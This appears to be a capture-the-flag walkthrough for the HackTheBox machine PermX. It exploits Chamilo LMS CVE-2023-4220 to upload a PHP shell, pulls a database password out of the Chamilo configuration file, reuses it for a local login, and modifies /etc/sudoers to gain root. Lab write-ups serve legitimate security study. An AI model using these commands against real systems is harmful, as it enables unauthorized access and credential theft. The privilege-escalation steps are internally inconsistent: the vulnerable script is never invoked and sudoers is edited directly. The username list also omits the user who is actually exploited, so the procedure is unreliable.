The machine hosts a Chamilo LMS instance vulnerable to CVE‑2023‑4220, allowing unauthenticated file upload and remote code execution. After obtaining a foothold as the web user, database credentials reveal a valid system user. Privilege escalation is achieved by abusing a sudo‑controlled script that follows symlinks.
Target: permx.htb
Initial vector: Chamilo LMS CVE‑2023‑4220 (unauthenticated RCE)
Privilege escalation: insecure sudo script + symlink abuse
Possible usernames (from site content or enumeration):
noah, elsie, ralph, mia, emma, sarah, johny, james
Directory fuzzing reveals:
/lms
The LMS is Chamilo, which is vulnerable to CVE‑2023‑4220.
Use the public exploit to upload a PHP shell:
$ ./CVE-2023-4220.sh -f shell.php -h http://lms.permx.htb -p 443
A reverse shell is obtained. Enumerate the system:
$ id $ whoami -> www-data
Inspect Chamilo configuration:
$ cat /var/www/chamilo/app/config/configuration.php | grep -C2 password -> chamilo : 03F6lY3uXAP2bkW8
Try the password for local users:
$ su mtz Password: 03F6lY3uXAP2bkW8
User access obtained.
Check sudo permissions:
$ sudo -l -> allowed to run /opt/acl.sh
The script follows symlinks, allowing arbitrary file modification.
Exploit by replacing /etc/sudoers with a symlink.
Create a symlink chain:
$ ln -s /etc/sudoers /home/mtz/LINK
Edit the sudoers file through the vulnerable script:
$ nano /etc/sudoers # Add: mtz ALL=(ALL:ALL) NOPASSWD:ALL
Now escalate:
$ sudo bash # id # whoami -> root
PermX combines a straightforward Chamilo RCE with a simple but effective symlink‑based privilege escalation.
After exploiting CVE‑2023‑4220 to gain initial access, the vulnerable acl.sh script allows modification
of /etc/sudoers, resulting in full system compromise.